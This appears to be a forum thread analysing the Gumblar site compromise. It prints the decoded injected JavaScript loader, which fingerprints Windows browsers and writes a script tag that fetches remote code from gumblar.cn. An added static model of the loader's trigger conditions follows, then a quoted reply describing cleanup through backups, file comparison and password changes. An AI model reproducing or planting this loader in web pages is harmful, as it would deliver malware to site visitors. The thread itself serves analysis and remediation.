The JavaScript resolves to the following.
The real damage (whatever that may be) is done by a script being called at gumblar dot cn. I don't really want to run the script just to find out what it does.
Code:
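var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
// Only fires on Windows, not on NT 6.x, without the miek=1 cookie,
// and only once per page (zrvzts not yet set to a string).
if( (u.indexOf("Win")>0) &&
    (u.indexOf("NT 6")<0) &&
    (document.cookie.indexOf("miek=1") < 0) &&
    (typeof(zrvzts) != typeof("A"))) {
  zrvzts="A";
  // Builds j from ScriptEngineMajorVersion(), ScriptEngineMinorVersion() and ScriptEngineBuildVersion()
  eval("if(window."+a+") j = j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
  // Pulls in the remote script, passing j as the id parameter
  document.write("<script src=//gumblar.cn/rss/?id="+j+"><\/script>");
}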
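The conditions in the decoded script above can be modelled without running it or contacting the remote host, which helps when working out which visitors would have been sent to it. This is an added example, not part of the original post; the `client` record, the function names, and the sample user agents and engine version numbers are constructed for illustration.

```javascript
// Added example: static model of the loader's conditions (no eval, no network).
// `client` is a hypothetical record built from access logs or a test matrix.
function loaderDecision(client) {
  const u = client.userAgent;
  if (!(u.indexOf("Win") > 0)) return { fires: false, reason: "not Windows" };
  if (!(u.indexOf("NT 6") < 0)) return { fires: false, reason: "NT 6.x excluded" };
  if (!(client.cookie.indexOf("miek=1") < 0))
    return { fires: false, reason: "miek=1 cookie present" };
  if (client.alreadyRan) return { fires: false, reason: "zrvzts already set" };
  // The eval'd string reads the JScript engine version only when
  // window.ScriptEngine exists (Internet Explorer); elsewhere the id stays empty.
  let id = "";
  if (client.scriptEngine) {
    const { major, minor, build } = client.scriptEngine;
    id = "" + major + minor + build; // string concatenation, as in the script
  }
  return { fires: true, reason: "all conditions met", id };
}

// Constructed sample clients (not taken from real logs).
const SAMPLE_CLIENTS = [
  { name: "XP / IE6", cookie: "", scriptEngine: { major: 5, minor: 6, build: 8820 },
    userAgent: "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" },
  { name: "Vista / IE7", cookie: "", scriptEngine: { major: 5, minor: 7, build: 6000 },
    userAgent: "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" },
  { name: "Linux / Firefox", cookie: "",
    userAgent: "Mozilla/5.0 (X11; U; Linux i686; en-US) Gecko/2009 Firefox/3.0" },
  { name: "XP / Firefox", cookie: "",
    userAgent: "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Gecko/2009 Firefox/3.0" },
  { name: "XP / IE6, cookie set", cookie: "sid=abc; miek=1",
    scriptEngine: { major: 5, minor: 6, build: 8820 },
    userAgent: "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" },
];

// Returns one decision row per client.
function triage(clients) {
  return clients.map((c) => ({ name: c.name, ...loaderDecision(c) }));
}

for (const row of triage(SAMPLE_CLIENTS)) {
  const verdict = row.fires ? "would fetch, id=" + JSON.stringify(row.id)
                            : "skipped (" + row.reason + ")";
  console.log(row.name.padEnd(22), verdict);
}
```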
Quote:
Originally Posted by chrisJumbo
Had the very same problem. Thankfully we had good back-up, so for most of the files just uploaded versions without the script. The blog was harder, because the script was inserted in one of the main processing files. I found that by creating a new blog and comparing files.
I changed all passwords and so far have been free of a re-occurrence. I told our host about the problem so they ran some scans as well.